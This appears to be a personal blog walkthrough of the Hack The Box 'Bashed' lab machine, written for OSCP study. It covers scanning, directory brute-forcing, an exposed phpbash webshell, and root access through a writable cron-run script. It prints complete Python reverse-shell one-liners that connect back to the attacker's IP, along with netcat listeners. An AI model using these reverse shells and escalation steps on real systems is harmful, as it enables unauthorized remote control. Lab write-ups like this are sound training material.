Super extended delay here.
So somethings I've been working on. I did the TCM Security PEH program. Why you ask if I already have the eJPT and compTIA Security +. Well because I like to learn and I found it pretty cool to go over Windows Directory attacks. I still haven't signed up for the OSCP and I am slowly working through the TJNULL list of OSCP-like boxes.
Difficulty level: Easy
Time to complete: Lets talk
I plan on removing the time to complete because I don't think it matters when doing these challenges and even less if you are new to HTB or Kali. Your main goal should be understanding the services on the box and how to get access plus how to use these tools.
Also I can't recommend the TCM PEH enough even if you just watch the first few videos on setting up Kali because he really walks you through what you should have your system.
So to the box.
I will start with a Nmap Scan to see what services are running on the machine.
-A = Identifying the target OS, Services and the versions on the machine. This will also do a traceroute.
To put it simply, "-A" = -sC, -sV -O -traceroute.
I think I need to write a script that does all of this kind of like AutoRecon.
So port 80 is running on the machine. This is pretty good because that means there is a website running here that I can potentially navigate to. So put the http://10.10.10.68/*80 into your browser.
A quick right-click search to look at the backend of the site. I don't see much there but I run dirb on another window to discover any directories.
After a few mins of running this nothing really comes up.
So I am going to try dirbuster instead. Dirbuster is an OWASP tool that has a nice GUI.
If you are on the 2021 version of kali and you are root.
Open up a new terminal as *User.
Another thing to note is that in here I specifiy some items:
File with list of dir/files:
php (I am just doing *php since its a php site)
After this runs for a few moments. Switch over to the Results/Scan information.
You should see a Directory Structure that list out structure of what is found. For each one, I will open it up to see if there is anything interesting there.
The first one I found is the /php and boom it shows a Index of /php
Here is a blog post that goes into a little details of why you shouldn't allow this accessible to the internet.
This site doesn't show any cool results so I will keep going down the line of the results shown before.
Still nothing much to play around here.
So the search continues....
Clicking on the phpbash.php shows that I have a webshell.
So I am going to be honest here and outside of the webshell I don't know what www-data@bashed:/# is.
But you know what I did? I went back to Google lol.
To basically sum it up, the files are not world writable and are restricted to the owner of the files for writing. With root being the owner, a compromised web server would have access to the entire system.
I am going to *ls-la in my current location to see what rights I have and if there is anything interesting. I see *home and *root there so I am going *cd into them to see if I can find the *txt files. And interesting enough I found the user.txt file in there.
Then I *cat the txt file. I can't access the *root file with my current permissions.
Lets see if I can get a reverse shell to my linux terminal.
Some more quick googling and I come across a few reverse shells from highon.
I tried the php one but no cigar though.
Lets give the python one a try. I am trying this also because *python is on the local bashed machine.
On your *Attacking Machine setup Netcat:
root@kali: nc -lnvp 80
Run the following code on the terminal *ww-data@bashed:/ *
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("tun0-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
So success! I was able to get a Reverse Shell on my terminal. Lets see if I can Switch users. So again I don't know how to do this so I am going to head over to Google to look.
I found the following issue request.
Then scroll down:
So I am going to give this a swing to see if I can switch users.
Run the following from the terminal.
sudo -l scriptmanager
I was able to switch users and I whoami to confirm.
Then I am going to try and cd into the Root location but no cigar as you see below.
Bummer, but I am stuck in this weird TTY so again quick Google again.
Ahh this is pretty interesting.
From here I re-Google how to escape a TTY which I found this.
Run the following from your terminal.
python -c 'import pty; pty.spawn("/bin/sh")'
This didn't work so I tried switching the /bin/bash since that is what's on the main machine.
python -c 'import pty; pty.spawn("/bin/bash")'
Boom this allows me in.
I tried the root file again but no juice.
But there looks like a Scripts folder I can access so I will see what's in there.
So a few things to be happening here:
- There is a test.py file that I own.
- There is a test.txt that appears to run every few minuets that's running the .py files.
Let's see if I can put a .py file in there.
echo > kali.py
Nice it works!
So pentest monkey has another php reverse shell I can use that I will attempt to get full root access on the machine with.
You can find it here.
The main thing here is to edit these 2 lines for your tun0 and port
So this is kind of up to you, Use wget or copy/paste. I use wget to make it simpler.
After you get this on your machine do the following.
chmod 777 php-reverse-shell.php
Now use nano or your favorite editing tool to open the file.
To exit hit CTRL-X and select Yes to Save
Okay so now that you have this file you need to put this on your victim machine so that it can talk back to your Kali machine.
Use simple local http server to load it there.
python3 -m http.server 80
So on your Victim machine you are going to use wget again to grab this file.
Then do the following for good measure.
Chmod 777 php-reverse-shell.php
Now run the following in a new terminal.
nc -lnvp 1234
So maybe I was doing this wrong but there was an uploads folder that it should allow us to direct to but I could be wrong. I am going to try this again later to see where I may have went wrong.
So I tried this a few times but it didn't work so I attempted something else out. I went back to Google to look for the python reverse shell.
I had to edit the original script a little.
Change: tun0 ip
Use: echo command since you are trying to display line of text/string that are passed as an argument.
Then create a .py file to be run by the machine.
First start a netcat again on your machine with your port.
nc -lvnp 1234
Then on your other terminal drop the python script in the terminal
echo import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("tun0",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]); > bashed.py
On your Netcat terminal give it 1-2mins to run then you should see a connection.
Way to go!
Some things I want to touch on. I used Google a lot for this. Like a lot! Also I hit some rabbit holes but I tried other things to get access to this machine. I am also trying to be as detailed as possible to show you exactly what I am doing to speed up your learning process. If you run into issues, knowing how to Google for the answers is your best option but also having a community to bounce ideas off of.
Get on a hacking discord server, follow certain OSCP subreddits, go on IRC, etc. What I am saying is that no one does this alone. Its good to have a community to be in to ask questions and read other peoples comments.